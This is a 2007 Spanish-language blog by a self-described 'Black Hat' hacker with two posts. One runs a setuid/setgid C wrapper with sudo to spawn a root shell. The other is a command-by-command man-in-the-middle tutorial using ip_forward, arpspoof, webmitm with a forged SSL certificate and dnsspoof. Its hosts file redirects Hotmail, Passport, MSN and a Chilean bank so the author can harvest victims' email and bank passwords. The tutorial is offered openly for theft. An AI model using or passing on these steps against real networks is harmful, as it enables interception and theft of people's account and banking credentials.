lunes, 25 de junio de 2007

Inventando Formas para acceder a la terminal con privilegios de root localmente

Hola de nuevo... como ven en el título, estaba ociando en mi terminal cuando derrepente me dije: ¿Será posible acceder como root usando setuid(0) y setgid(0) con el comando sudo?

jejeje veamos como me fue:

Zodiac@Zion:~/Desktop$ cat > shell.c
main(){
setuid(0);
setgid(0);
system("/bin/bash");
}

Zodiac@Zion:~/Desktop$ gcc -o shell shell.c

Bueno, lo que escribí aquí es simplemente un programa que al ser ejecutado invoca a bash, no sin antes haber elevado sus privilegios hasta obtener uid=0 y gid=0 (bash es lanzado como proceso hijo y hereda los privilegios de nuestro programa). Es una forma digna de saltarnos la protección que impone bash.

Zodiac@Zion:~/Desktop$ ls -l shell
-rwxr-xr-x 1 Zodiac Zodiac 6871 2007-06-25 19:16 shell

Aqui solo indico que se trata de un programa con privilegios de user normal.

Ahora se viene la parte interesante, iré lento:

Zodiac@Zion:~/Desktop$ sudo ./shell
Password:
root@Zion:~/Desktop#


Vaya, ahora tenemos una shell con privilegios de root... no lo puedo creer!!

root@Zion:~/Desktop# whoami
root

jejjejeje despues de todo ese escándalo que hice... les demuestro que esta es una forma para obtener privilegios de root, entre muchas de las que existen... espero que me muestren otras formas... estaba pensando en algo parecido (usando el mismo proggie shell) y darle privilegios de root a travez de las configuraciones y esas cosas... allá su imaginación...


Su servidor!


ºZodiacº
Black Hat
MitM Team
Chilean Hackers

domingo, 24 de junio de 2007

Un poco de Hacking para entrar en confianza :P

Hola, bueno... estaba pensando en mostrar una de las técnicas que más uso, el Man-In-The-Middle (MitM). Usaré esta técnica para mostrarles que tan fácil puede ser robar las contraseñas de Hotmail (o cualquier otra cosa) en red, sin usar remote exploits ni nada parecido.

Primero debemos obviamente estar en la red, con una terminal linux (ya sea un LiveCD, de seguro despues enseño como crear nuestra propia LiveCD personalizada). Debemos asegurarnos que tenemos instalada la herramienta DSniff...

Bueno, suponiendo que la tenemos... vamos a activar el ip_forwarding, para que la conexion pase por nosotros y asi ponernos en medio sin problemas, con el siguiente código

# echo 1 > /proc/sys/net/ipv4/ip_forward

Luego de esto envenenaremos la tabla ARP de la victima, para hacerle creer a la maquina victima, que nuestra mac address es el router (o la máquina que le proporciona internet).

# arpspoof -t ip_victima ip_router

Ahora solo debemos conseguirnos un certificado SSL... pero hay un programa que lo hace por nosotros (el webmitm). Solo debemos ejecutarlo sin argumentos y comenzará a hacernos preguntas para crear el certificado.

Ya creado el certificado, deberemos crear un archivo con extension .hosts con los nombres de dominio a controlar, de la forma:

ip_atacante *.passport.com
ip_atacante *.hotmail.com
ip_atacante *.passport.net
ip_atacante *.msn.com
ip_atacante *.bbva.cl // tambien podemos robarnos las cuentas bancarias!


la guardamos como hotmail.hosts

Solo nos queda activar el sniffer, para que atienda las peticiones de estas webs

# dnsspoof -f hotmail.hosts

Y finalmente, activar nuestro queridísimo programa...


# webmitm -d


Hecho esto, tenemos que esperar... en la PC víctima, cada vez que ingrese a una de esas webs le saldrá el certificado, pero en promedio nunca lo leen y aceptan (la desesperacion de entrar en su correo), con esto ingresarán a su correo normalmente escribiendo sus datos... Cosa que nosotros desde nuestra terminal observaremos y anotaremos detallada y detenidamente...

Ven que el hacking no es tan dificil ??

ByteZ

ºZodiacº
Black Hat
MitM Team
Chilean Hackers

Inicio!

Hola... hice este blog para publicar parte de mis investigaciones, tanto de programacion, como hacking, phreaking, electronica y demases.

Espero que sea de utilidad para la comunidad





ByteZ